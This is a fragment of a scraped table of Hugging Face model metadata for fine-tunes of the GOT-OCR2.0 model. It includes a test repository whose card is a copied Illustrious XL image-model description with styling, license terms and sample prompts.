""RepoSibling(rfilename='modeling_GOT.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='qwen.tiktoken', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='render_tools.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_qwen.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""stepfun-ai/GOT_official_online_demo"", ""Tonic/GOT-OCR"", ""merve/vision_papers"", ""Tonic1/ImageEdit-GOT-OCR"", ""awacke1/TorchTransformers-CV-SFT"", ""Solo448/OCR_MULTILINGUAL-GOT"", ""omkar-surve126/Image-to-Text-Using-General-OCR-Theory"", ""awacke1/ImageToLineDrawingsWithVideo"", ""Kaballas/MinerU"", ""Mandi47/stepfun-ai-GOT-OCR2_0"", ""yashnd/ocr"", ""yashnd/stepfun-ai-GOT-OCR2_0"", ""srikar-v05/Simple_image_search_using_GOT_OCR_2.0"", ""sfsfee/smithiooou"", ""sfsfee/fdgdhfdgh"", ""sfsfee/Streamlit"", ""akhil-vaidya/GOT-OCR"", ""UniquePratham/DualTextOCRFusion"", ""aliarmaghan78/GOT-OCR-Model"", ""Satvik-ai/Scan_Master"", ""khaled06/ocr_to_text"", ""ppaihack/space1"", ""SansG2003/GOT_OCR2.0"", ""SansG2003/OCR2.0_GOT"", ""vrh15/OCR_and_Document_Search_Web_Application"", ""Vinay15/OCR_and_Document_Search_Web_Application"", ""ChinmoyDutta/OCR_demo"", ""Divyansh12/OCR_Application"", ""DeepDiveDev/OCR"", ""shivamAttarkar/OCR"", ""aarishshahmohsin/ocr_gradio"", ""omvishesh/OCR-app"", ""justin4602/ocr"", ""ilovetensor/snap-assist"", ""Rashi123/TEXT_OCR"", ""TheKnight115/T5_final_project"", ""harshasatyavardhan/mahesh"", ""khaled06/ocr_summarization_and_question_answering"", ""yashbyname/OCR_using_GOT_and_Tesseract"", ""lithish2602/OCR_GOT_2.0_MODEL"", ""Vinay15/OCR"", ""hackK/Ocr"", ""coolfrxcrazy/YOLO_MODEL_DETECTION"", ""SanyaAhmed/OCR-Document-Search"", ""Nekorise/nekoSp"", ""thinler/GOTOCR"", ""Zienab/ocr-2"", ""Zienab/ocr-3"", ""artglobal/GOT_official_online_demo"", ""mashaelalbu/ocrsensitive"", ""artglobal/got_ocr_test"", ""suppg02/stepfun-ai-GOT-OCR2_0"", ""suppg02/stepfun-ai-GOT-OCR2_01"", ""alexneakameni/card_id_counter"", ""MahmoudAbdelmaged/GOT"", ""Spanicin/pdfextraction"", ""JabriA/OCR"", ""mohammedRiad/got-ocr-api""], ""safetensors"": {""parameters"": {""BF16"": 716033280}, ""total"": 716033280}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-04 00:37:25+00:00"", ""cardData"": ""language:\n- multilingual\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- got\n- vision-language\n- ocr2.0\n- custom_code"", ""transformersInfo"": null, ""_id"": ""66e310947b8ce2359ed82126"", ""modelId"": ""stepfun-ai/GOT-OCR2_0"", ""usedStorage"": 1432126851}",0,"https://huggingface.co/justmywyw/testModel, https://huggingface.co/pranavdaware/web_ocr, https://huggingface.co/LuoKinging/learning-1",3,"https://huggingface.co/katphlab/got-ocr2-latex, https://huggingface.co/Effectz-AI/GOT-OCR2_0_Invoice_MD",2,https://huggingface.co/can-gaa-hou/GOT-OCR2.0-OpenVINO-INT4,1,,0,"MahmoudAbdelmaged/GOT, Rashi123/TEXT_OCR, Solo448/OCR_MULTILINGUAL-GOT, Tonic/GOT-OCR, UniquePratham/DualTextOCRFusion, akhil-vaidya/GOT-OCR, awacke1/TorchTransformers-CV-SFT, huggingface/InferenceSupport/discussions/181, mashaelalbu/ocrsensitive, merve/vision_papers, omkar-surve126/Image-to-Text-Using-General-OCR-Theory, suppg02/stepfun-ai-GOT-OCR2_01, ucaslcl/GOT_online, yashbyname/OCR_using_GOT_and_Tesseract",14
|
| 109 |
+
justmywyw/testModel,"---
|
| 110 |
+
license_link: https://freedevproject.org/faipl-1.0-sd/
|
| 111 |
+
tags:
|
| 112 |
+
- tag
|
| 113 |
+
- '1234'
|
| 114 |
+
dd: 1
|
| 115 |
+
language:
|
| 116 |
+
- en
|
| 117 |
+
- cn
|
| 118 |
+
- zh
|
| 119 |
+
base_model: stepfun-ai/GOT-OCR2_0
|
| 120 |
+
pipeline_tag: image-to-text
|
| 121 |
+
library_name: diffusers
|
| 122 |
+
metrics:
|
| 123 |
+
- accuracy
|
| 124 |
+
---
|
| 125 |
+
<style>
|
| 126 |
+
@import url('https://fonts.googleapis.com/css2?family=Montserrat&family=Playwrite+DE+Grund:wght@100..400&display=swap');
|
| 127 |
+
.title-container {
|
| 128 |
+
display: flex;
|
| 129 |
+
justify-content: center;
|
| 130 |
+
align-items: center;
|
| 131 |
+
height: 20vh;
|
| 132 |
+
}
|
| 133 |
+
/* Title Base Styling */
|
| 134 |
+
.title {
|
| 135 |
+
text-align: center;
|
| 136 |
+
letter-spacing: -0.02em;
|
| 137 |
+
line-height: 1.2;
|
| 138 |
+
padding: 0.5em 0;
|
| 139 |
+
}
|
| 140 |
+
.playwrite-de-grund-title {
|
| 141 |
+
font-size: 40px;
|
| 142 |
+
font-style: normal; /* You can change to italic if needed */
|
| 143 |
+
color: black;
|
| 144 |
+
}
|
| 145 |
+
@keyframes titlePulse {
|
| 146 |
+
0% { transform: scale(1); }
|
| 147 |
+
100% { transform: scale(1.05); }
|
| 148 |
+
}
|
| 149 |
+
.custom-table {
|
| 150 |
+
table-layout: fixed;
|
| 151 |
+
width: 100%;
|
| 152 |
+
border-collapse: separate;
|
| 153 |
+
border-spacing: 1em;
|
| 154 |
+
margin-top: 2em;
|
| 155 |
+
}
|
| 156 |
+
.custom-table td {
|
| 157 |
+
width: 33.333%;
|
| 158 |
+
vertical-align: top;
|
| 159 |
+
padding: 0;
|
| 160 |
+
}
|
| 161 |
+
.custom-image-container {
|
| 162 |
+
position: relative;
|
| 163 |
+
width: 100%;
|
| 164 |
+
height: 100%
|
| 165 |
+
margin-bottom: 1em;
|
| 166 |
+
overflow: hidden;
|
| 167 |
+
align-items: center;
|
| 168 |
+
border-radius: 15px;
|
| 169 |
+
box-shadow: 0 10px 20px rgba(0, 0, 0, 0.3);
|
| 170 |
+
transition: all 0.3s ease;
|
| 171 |
+
}
|
| 172 |
+
.custom-image-container:hover {
|
| 173 |
+
transform: translateY(-10px);
|
| 174 |
+
box-shadow: 0 15px 30px rgba(0, 0, 0, 0.4);
|
| 175 |
+
}
|
| 176 |
+
.custom-image {
|
| 177 |
+
width: 100%;
|
| 178 |
+
height: auto;
|
| 179 |
+
object-fit: cover;
|
| 180 |
+
transition: transform 0.5s;
|
| 181 |
+
}
|
| 182 |
+
.last-image-container {
|
| 183 |
+
display: grid;
|
| 184 |
+
grid-template-columns: 1fr; /* One column for vertical layout */
|
| 185 |
+
gap: 0px; /* Remove space between images */
|
| 186 |
+
width: 80%; /* Adjust as needed */
|
| 187 |
+
height: 100%; /* Set full height */
|
| 188 |
+
}
|
| 189 |
+
.last-image-container img {
|
| 190 |
+
width: 100%; /* Full width for each image */
|
| 191 |
+
height: auto; /* Maintain aspect ratio */
|
| 192 |
+
}
|
| 193 |
+
.custom-image-container:hover .custom-image {
|
| 194 |
+
transform: scale(1.1);
|
| 195 |
+
}
|
| 196 |
+
.playwrite-de-grund-title .company-name {
|
| 197 |
+
font-size: 40px;
|
| 198 |
+
}
|
| 199 |
+
.nsfw-filter {
|
| 200 |
+
filter: blur(10px);
|
| 201 |
+
transition: filter 0.3s ease;
|
| 202 |
+
}
|
| 203 |
+
.custom-image-container:hover .nsfw-filter {
|
| 204 |
+
filter: blur(5px);
|
| 205 |
+
}
|
| 206 |
+
.overlay {
|
| 207 |
+
position: absolute;
|
| 208 |
+
top: 0;
|
| 209 |
+
left: 0;
|
| 210 |
+
right: 0;
|
| 211 |
+
bottom: 0;
|
| 212 |
+
background: rgba(0, 0, 0, 0.7);
|
| 213 |
+
display: flex;
|
| 214 |
+
flex-direction: column;
|
| 215 |
+
justify-content: center;
|
| 216 |
+
align-items: center;
|
| 217 |
+
opacity: 0;
|
| 218 |
+
transition: opacity 0.3s;
|
| 219 |
+
}
|
| 220 |
+
.custom-image-container:hover .overlay {
|
| 221 |
+
opacity: 1;
|
| 222 |
+
}
|
| 223 |
+
.overlay-text {
|
| 224 |
+
font-size: 1.5em;
|
| 225 |
+
font-weight: bold;
|
| 226 |
+
color: #FFFFFF;
|
| 227 |
+
text-align: center;
|
| 228 |
+
padding: 0.5em;
|
| 229 |
+
background: linear-gradient(45deg, #E74C3C, #C0392B);
|
| 230 |
+
-webkit-background-clip: text;
|
| 231 |
+
-webkit-text-fill-color: transparent;
|
| 232 |
+
text-shadow: 3px 3px 6px rgba(0, 0, 0, 0.7);
|
| 233 |
+
}
|
| 234 |
+
.overlay-subtext {
|
| 235 |
+
font-size: 0.85em;
|
| 236 |
+
color: #F0F0F0;
|
| 237 |
+
margin-top: 0.5em;
|
| 238 |
+
font-style: italic;
|
| 239 |
+
text-shadow: 3px 3px 6px rgba(0, 0, 0, 0.5);
|
| 240 |
+
}
|
| 241 |
+
.model-info {
|
| 242 |
+
font-style: bold;
|
| 243 |
+
}
|
| 244 |
+
@media (max-width: 768px) {
|
| 245 |
+
.title {
|
| 246 |
+
font-size: 3rem;
|
| 247 |
+
}
|
| 248 |
+
.custom-table td {
|
| 249 |
+
display: block;
|
| 250 |
+
width: 70%;
|
| 251 |
+
}
|
| 252 |
+
}
|
| 253 |
+
.playwrite-de-grund-title .trained-by {
|
| 254 |
+
font-size: 32px; /* Smaller font size for ""trained by"" part */
|
| 255 |
+
}
|
| 256 |
+
</style>
|
| 257 |
+
<head>
|
| 258 |
+
<link
|
| 259 |
+
rel=""stylesheet""
|
| 260 |
+
href=""https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.8.2/css/all.min.css""
|
| 261 |
+
/>
|
| 262 |
+
</head>
|
| 263 |
+
<body>
|
| 264 |
+
<div class=""title-container"">
|
| 265 |
+
<h1 class=""title"">
|
| 266 |
+
<i class=""fa-thin fa-palette""></i>
|
| 267 |
+
<span class=""playwrite-de-grund-title""><b>Illustrious XL v0.1</b><br> <span class=""trained-by"">trained by</span> <a rel=""nofollow"" href=""https://onomaai.com/""><b><span class=""company-name"">Onoma AI</span></b></a></span>
|
| 268 |
+
</h1>
|
| 269 |
+
</div>
|
| 270 |
+
<table class=""custom-table"">
|
| 271 |
+
<tr>
|
| 272 |
+
<td>
|
| 273 |
+
<div class=""custom-image-container"">
|
| 274 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/dXvGxUKjcsqzt_gDWc9FU.png"" alt=""s00"">
|
| 275 |
+
</div>
|
| 276 |
+
<div class=""custom-image-container"">
|
| 277 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/TjfHgNIgpfhX1Josy-a1h.png"" alt=""s01"">
|
| 278 |
+
</div>
|
| 279 |
+
<div class=""custom-image-container"">
|
| 280 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/YMxjs05WcbuS5sIjeqOJr.png"" alt=""s02"">
|
| 281 |
+
</div>
|
| 282 |
+
</td>
|
| 283 |
+
<td>
|
| 284 |
+
<div class=""custom-image-container"">
|
| 285 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/ChTQ2UKphqbFsyKF9ddNY.png"" alt=""s10"">
|
| 286 |
+
</div>
|
| 287 |
+
<div class=""custom-image-container"">
|
| 288 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/PO3_B7AeUVq59OWHidEas.png"" alt=""s11"">
|
| 289 |
+
</div>
|
| 290 |
+
<div class=""custom-image-container"">
|
| 291 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/hLR6af7AluIYQPB6GXQYh.png"" alt=""s12"">
|
| 292 |
+
</div>
|
| 293 |
+
</td>
|
| 294 |
+
<td>
|
| 295 |
+
<div class=""custom-image-container"">
|
| 296 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/4kdzhZAGp_VLEqat6T5Yv.png"" alt=""s20"">
|
| 297 |
+
</div>
|
| 298 |
+
<div class=""custom-image-container"">
|
| 299 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/05bgqY-9S2dNxtpa6WmNV.png"" alt=""s21"">
|
| 300 |
+
</div>
|
| 301 |
+
<div class=""custom-image-container"">
|
| 302 |
+
<img class=""custom-image"" src=""https://cdn-uploads.huggingface.co/production/uploads/65eea2d62cc24ebc6dbe16c0/yAYxcQ1IK_dytlPGObMe4.png"" alt=""s22"">
|
| 303 |
+
</div>
|
| 304 |
+
</td>
|
| 305 |
+
</tr>
|
| 306 |
+
</table>
|
| 307 |
+
|
| 308 |
+
<div>
|
| 309 |
+
<p>
|
| 310 |
+
Illustrious XL is the Illustration focused Stable Diffusion XL model which is continued from Kohaku XL Beta 5, trained by OnomaAI Research Team.
|
| 311 |
+
The model focuses on utilizing large-scale annotated dataset, <a href=""https://huggingface.co/datasets/nyanko7/danbooru2023"">Danbooru2023.</a>
|
| 312 |
+
We release the v0.1 and v0.1-GUIDED model here, under fair public ai license, however discourages the usage of model over monetization purpose / any closed source purposes.
|
| 313 |
+
For full technical details, please refer to our technical report.
|
| 314 |
+
</p>
|
| 315 |
+
<p>
|
| 316 |
+
<strong>Model Information:</strong>
|
| 317 |
+
</p>
|
| 318 |
+
<ul style=""margin-left: 20px;"">
|
| 319 |
+
<li><strong>Name:</strong> Illustrious-XL-v0.1</li>
|
| 320 |
+
<li><strong>Model Type:</strong> Stable Diffusion XL Model</li>
|
| 321 |
+
<li><strong>Dataset:</strong> Fine-tuned on Danbooru2023 Dataset</li>
|
| 322 |
+
</ul>
|
| 323 |
+
<p>
|
| 324 |
+
<strong>Description</strong>:
|
| 325 |
+
</p>
|
| 326 |
+
<ul style=""margin-left: 20px;"">
|
| 327 |
+
<li><strong>Illustrious-XL</strong> is a powerful generative model series, fine-tuned on the comprehensive Danbooru2023 dataset and its variants. It includes a wide variety of character designs, styles, and artistic knowledge derived from the dataset, making it suitable for creative and artistic AI generation tasks.</li>
|
| 328 |
+
<li><strong>Illustrious-XL-v0.1</strong> is untuned BASE model, which works as possible base for all future model variants. LoRAs / Adapters can be trained on this model, ensuring future usecases. The model is research-only purpose, as not tuned for aesthetics / preferences.</li>
|
| 329 |
+
<li><strong>Illustrious-XL-v0.1-GUIDED</strong> is minimally safety controlled model, which works as better option for usual usecases.</li>
|
| 330 |
+
</ul>
|
| 331 |
+
We plan to release several aesthetic-finetuned model variants in near future.
|
| 332 |
+
<p>
|
| 333 |
+
<strong>Technical Details:</strong>
|
| 334 |
+
</p>
|
| 335 |
+
<ul style=""margin-left: 20px;"">
|
| 336 |
+
<li> <a href=""https://arxiv.org/abs/2409.19946"" target=""_blank"">https://arxiv.org/abs/2409.19946</a> </li>
|
| 337 |
+
</ul>
|
| 338 |
+
<p>
|
| 339 |
+
<strong>Terms and Conditions:</strong>
|
| 340 |
+
</p>
|
| 341 |
+
<ul style=""margin-left: 20px;"">
|
| 342 |
+
<li>We recommend to use official repositories, to prevent malicious attacks.</li>
|
| 343 |
+
<li>Users must agree with LICENSE to use the model. As mentioned in LICENSE, we do NOT take any actions about generated results or possible variants.</li>
|
| 344 |
+
<li> <strong>As mentioned in LICENSE, users must NOT use the generated result for any prohibited purposes, including but not limited to:</strong></li>
|
| 345 |
+
<ul style=""margin-left: 20px;"">
|
| 346 |
+
<li><strong>Harmful or malicious activities</strong>: This includes harassment, threats, spreading misinformation, or any use intended to harm individuals or groups.</li>
|
| 347 |
+
<li><strong>Illegal activities</strong>: Using generated content to violate any applicable laws or regulations.</li>
|
| 348 |
+
<li><strong>Unethical, offensive content generation</strong>: Generating offensive, defamatory, or controversial content that violates ethical guidelines.</li>
|
| 349 |
+
</ul>
|
| 350 |
+
</ul>
|
| 351 |
+
By using this model, users agree to comply with the conditions outlined in the LICENSE and acknowledge responsibility for how they utilize the generated content.
|
| 352 |
+
<p>
|
| 353 |
+
<strong>Safety Control Recommendation:</strong>
|
| 354 |
+
</p>
|
| 355 |
+
<ul style=""margin-left: 20px;"">
|
| 356 |
+
<li>Generative models can occasionally produce unintended or harmful outputs.</li>
|
| 357 |
+
<li>To minimize this risk, it is strongly recommended to use the GUIDED model variant, which incorporates additional safety mechanisms for responsible content generation.</li>
|
| 358 |
+
<li>By choosing this variant, users can significantly reduce the likelihood of generating harmful or unintended content.</li>
|
| 359 |
+
<li>We plan to update GUIDED model variants and its methodologies, with extensive research.</li>
|
| 360 |
+
</ul>
|
| 361 |
+
<p>
|
| 362 |
+
<strong>Training/Merging Policy:</strong><br>
|
| 363 |
+
You may fine-tune, merge, or train LoRA based on this model. However, to foster an open-source community, you are required to:
|
| 364 |
+
</p>
|
| 365 |
+
<ul style=""margin-left: 20px;"">
|
| 366 |
+
<li>Openly share details of any derived models, including references to the original model licensed under the fair-ai-public-license.</li>
|
| 367 |
+
<li>Provide information on datasets and ""merge recipes"" used for fine-tuning or training.</li>
|
| 368 |
+
<li>Adhere to the <strong>fair-ai-public-license</strong>, ensuring that any derivative works are also open source.</li>
|
| 369 |
+
</ul>
|
| 370 |
+
<p>
|
| 371 |
+
<strong>Uploading / Generation Policy:</strong><br>
|
| 372 |
+
We do not restrict any upload or spread of the generation results, as we do not own any rights regard to generated materials. This includes 'personally trained models / finetuned models / trained lora-related results'. However, we kindly ask you to open the generation details, to foster the open source communities and researches.
|
| 373 |
+
</p>
|
| 374 |
+
<p>
|
| 375 |
+
<strong>Monetization Prohibition:</strong>
|
| 376 |
+
<ul style=""margin-left: 20px;"">
|
| 377 |
+
<li>You are prohibited from monetizing any <strong>close-sourced fine-tuned / merged model, which disallows the public from accessing the model's source code / weights and its usages.</strong></li>
|
| 378 |
+
<li>As per the license, you must openly publish any derivative models and variants. This model is intended for open-source use, and all derivatives must follow the same principles.</li>
|
| 379 |
+
</ul>
|
| 380 |
+
</p>
|
| 381 |
+
<p>
|
| 382 |
+
<strong>Usage:</strong><br>
|
| 383 |
+
We do not recommend overusing critical composition tags such as 'close-up', 'upside-down', or 'cowboy shot', as they can be conflicting and lead to confusion, affecting model results.<br>
|
| 384 |
+
Recommended sampling method: Euler a, Sampling Steps: 20–28, CFG: 5–7.5 (may vary based on use case).<br>
|
| 385 |
+
We suggest using suitable composition tags like ""upper body,"" ""cowboy shot,"" ""portrait,"" or ""full body"" depending on your use case.<br>
|
| 386 |
+
The model supports quality tags such as: ""worst quality,"" ""bad quality,"" ""average quality,"" ""good quality,"" ""best quality,"" and ""masterpiece (quality).""<br>
|
| 387 |
+
Note: The model does not have any default style. This is intended behavior for the base model.
|
| 388 |
+
</p>
|
| 389 |
+
<div class=""last-image-container"">
|
| 390 |
+
<img src=""https://cdn-uploads.huggingface.co/production/uploads/651d27e3a00c49c5e50c0653/RiStls1S26meeu8UV8wKj.png"" alt=""s23"">
|
| 391 |
+
<p><strong>Prompt:</strong><br>
|
| 392 |
+
1boy, holding knife, blue eyes, jewelry, jacket, shirt, open mouth, hand up, simple background, hair between eyes, vest, knife, tongue, holding weapon, grey vest, upper body, necktie, solo, looking at viewer, smile, pink blood, weapon, dagger, open clothes, collared shirt, blood on face, tongue out, blonde hair, holding dagger, red necktie, white shirt, blood, short hair, holding, earrings, long sleeves, black jacket, dark theme
|
| 393 |
+
</p>
|
| 394 |
+
<p><strong>Negative Prompt:</strong><br>
|
| 395 |
+
worst quality, comic, multiple views, bad quality, low quality, lowres, displeasing, very displeasing, bad anatomy, bad hands, scan artifacts, monochrome, greyscale, signature, twitter username, jpeg artifacts, 2koma, 4koma, guro, extra digits, fewer digits
|
| 396 |
+
</p>
|
| 397 |
+
<img src=""https://cdn-uploads.huggingface.co/production/uploads/63398de08f27255b6b50081a/2QgPFOXbu0W6XjAMvLryY.png"" alt=""s24"">
|
| 398 |
+
<p><strong>Prompt:</strong><br>
|
| 399 |
+
1girl, extremely dark, black theme, silhouette, rim lighting, black, looking at viewer, low contrast, masterpiece
|
| 400 |
+
</p>
|
| 401 |
+
<p><strong>Negative Prompt:</strong><br>
|
| 402 |
+
worst quality, comic, multiple views, bad quality, low quality, lowres, displeasing, very displeasing, bad anatomy, bad hands, scan artifacts, monochrome, greyscale, twitter username, jpeg artifacts, 2koma, 4koma, guro, extra digits, fewer digits, jaggy lines, unclear
|
| 403 |
+
</p>
|
| 404 |
+
</div>
|
| 405 |
+
|
| 406 |
+
</div>
|
| 407 |
+
</body>","{""id"": ""justmywyw/testModel"", ""author"": ""justmywyw"", ""sha"": ""d4b3ec46bdcb588fba2868cbde4e8a62fc75a6dd"", ""last_modified"": ""2025-03-13 10:46:44+00:00"", ""created_at"": ""2022-04-19 09:50:14+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""tag"", ""1234"", ""image-to-text"", ""en"", ""cn"", ""zh"", ""arxiv:2409.19946"", ""base_model:stepfun-ai/GOT-OCR2_0"", ""base_model:finetune:stepfun-ai/GOT-OCR2_0"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: stepfun-ai/GOT-OCR2_0\nlanguage:\n- en\n- cn\n- zh\nlibrary_name: diffusers\nlicense_link: https://freedevproject.org/faipl-1.0-sd/\nmetrics:\n- accuracy\npipeline_tag: image-to-text\ntags:\n- tag\n- '1234'\ndd: 1"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='4607043b-59e6-489c-9196-57d07ae7be46 (2).mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='4607043b-59e6-489c-9196-57d07ae7be46.mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='QwQ32B.yml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='frame_generic_light.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mmm.mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='studio-cover_1bdfd4f9-c3d4-4347-a0f3-f45bb3a806bf.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='test/card.svg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='test/test', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='test1', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='testMd', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='undraw_Code_review_re_woeb', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='undraw_chatting_re_j55r', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='undraw_chatting_re_j55r.svg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='\u672a\u547d\u540d(1).png', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-13 10:46:44+00:00"", ""cardData"": ""base_model: stepfun-ai/GOT-OCR2_0\nlanguage:\n- en\n- cn\n- zh\nlibrary_name: diffusers\nlicense_link: https://freedevproject.org/faipl-1.0-sd/\nmetrics:\n- accuracy\npipeline_tag: image-to-text\ntags:\n- tag\n- '1234'\ndd: 1"", ""transformersInfo"": null, ""_id"": ""625e85d6b39793496f793ef3"", ""modelId"": ""justmywyw/testModel"", ""usedStorage"": 9021130}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=justmywyw/testModel&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bjustmywyw%2FtestModel%5D(%2Fjustmywyw%2FtestModel)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 408 |
+
pranavdaware/web_ocr,"
|
| 409 |
+
---
|
| 410 |
+
license: apache-2.0
|
| 411 |
+
language:
|
| 412 |
+
- hi
|
| 413 |
+
- en
|
| 414 |
+
metrics:
|
| 415 |
+
- accuracy
|
| 416 |
+
base_model:
|
| 417 |
+
- stepfun-ai/GOT-OCR2_0
|
| 418 |
+
pipeline_tag: image-to-text
|
| 419 |
+
---","{""id"": ""pranavdaware/web_ocr"", ""author"": ""pranavdaware"", ""sha"": ""1a22f882b761e45c1c660f4890af637462b392f2"", ""last_modified"": ""2024-10-10 12:30:14+00:00"", ""created_at"": ""2024-09-30 12:16:34+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 5, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""GOT"", ""image-to-text"", ""custom_code"", ""hi"", ""en"", ""base_model:stepfun-ai/GOT-OCR2_0"", ""base_model:finetune:stepfun-ai/GOT-OCR2_0"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- stepfun-ai/GOT-OCR2_0\nlanguage:\n- hi\n- en\nlicense: apache-2.0\nmetrics:\n- accuracy\npipeline_tag: image-to-text"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""GOTQwenForCausalLM""], ""auto_map"": {""AutoConfig"": ""modeling_GOT.GOTConfig"", ""AutoModel"": ""modeling_GOT.GOTQwenForCausalLM""}, ""model_type"": ""GOT"", ""tokenizer_config"": {""eos_token"": ""<|im_end|>"", ""pad_token"": ""<|endoftext|>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='got_vision_b.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_GOT.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='qwen.tiktoken', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='render_tools.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_qwen.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 560528640}, ""total"": 560528640}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-10 12:30:14+00:00"", ""cardData"": ""base_model:\n- stepfun-ai/GOT-OCR2_0\nlanguage:\n- hi\n- en\nlicense: apache-2.0\nmetrics:\n- accuracy\npipeline_tag: image-to-text"", ""transformersInfo"": null, ""_id"": ""66fa96a234ceaf45bd4449bf"", ""modelId"": ""pranavdaware/web_ocr"", ""usedStorage"": 2242169024}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=pranavdaware/web_ocr&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bpranavdaware%2Fweb_ocr%5D(%2Fpranavdaware%2Fweb_ocr)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 420 |
+
LuoKinging/learning-1,"---
|
| 421 |
+
license: mit
|
| 422 |
+
datasets:
|
| 423 |
+
- argilla/FinePersonas-v0.1
|
| 424 |
+
language:
|
| 425 |
+
- zh
|
| 426 |
+
metrics:
|
| 427 |
+
- accuracy
|
| 428 |
+
base_model:
|
| 429 |
+
- stepfun-ai/GOT-OCR2_0
|
| 430 |
+
new_version: black-forest-labs/FLUX.1-dev
|
| 431 |
+
pipeline_tag: token-classification
|
| 432 |
+
library_name: allennlp
|
| 433 |
+
tags:
|
| 434 |
+
- test
|
| 435 |
+
- luoking
|
| 436 |
+
